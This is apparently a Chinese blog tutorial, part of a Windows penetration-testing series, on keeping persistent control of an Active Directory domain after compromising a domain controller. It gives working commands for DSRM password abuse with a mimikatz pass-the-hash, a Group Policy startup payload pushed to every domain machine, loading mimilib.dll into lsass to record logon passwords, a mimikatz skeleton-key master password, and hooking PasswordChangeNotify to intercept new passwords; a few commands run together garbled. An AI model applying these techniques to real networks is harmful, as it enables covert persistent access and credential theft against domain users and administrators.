Windows内网渗透

Windows内网渗透_6.域维权

20 Dec 2022

该方法相当于重置了域控机器上的本地管理员密码。

DSRM，目录服务还原模式，是Windows服务器域控制器的安全模式启动选项。DSRM允许管理员用来修复或还原修复或重建活动目录数据库。DSRM账户实际上就是“Administrator”，也就是域控上面的本地管理员账号，非域管理员账号。当建立域控时，会让我们设置DSRM密码：

我们用如下命令在域控上同步DSRM密码：

ntdsutilset DSRM passwordSYNC FROM DOMAIN ACCOUNT username

即把DSRM重置成了和win7user用户一样的密码：

再在域控上添加注册表：

reg add “ HKLM\System\CurrentControlSet\Control\Lsa” /v DSRMAdminLogonBehavior /t REG_DWORD /d 2

最后用pth连接过去：

sekurlsa::pth /domain:computername /user:Administrator /ntlm: b367819c0a8ccd792cad1d034f56a1fa

当我们获取到管理员权限时，可以通过添加组策略手段，实现用户开机自启动。

域控上执行过程如下：

打开gpmc.msc ，编辑默认组策略：

然后添加启动项：

并在对应的组策略目录下添加你的文件：

再执行如下命令强制刷新组策略：

gpupdate /force

最终域内其他机器重启后就会执行对应的文件/脚本：

SecuritySupport Provider理解为一个dll，用来实现身份认证；SecuritySupport Provider Interface理解为SSP的API，用于执行各种与安全相关的操作，如身份验证。

在系统启动的时候，SSP会被加载到lsass.exe中,也就是说我们可以自定义一个dll在系统启动时加载到lsass.exe中。

利用mimikatz：

1、将mimilib.dll复制到域控c:\windows\system32

2、添加注册表: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\SecurityPackages\

添加mimilib.dll

3、重启后记录登录的密码：

也可以不重启,利用RPC加载SSP。

利用mimikatz安装一个万能密码，“mimikatz”，实现代码可以参考如下：

https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_misc.c

privilege::debugmisc::skeleton

当执行完上述命令后，就可以使用“mimikatz”作为一个万能密码，去连接域控，该方法可用于当域控密码被改掉时，我们依然可以去控制域控。

6.5、HookPasswordChangeNotify

通过往lsass.exe进程中注入dll，达到通过Hook PasswordChangeNotify拦截修改的帐户密码。该方法可用于拦截域内修改的密码。

项目地址：https://github.com/Jumbo-WJB/Misc-Windows-Hacking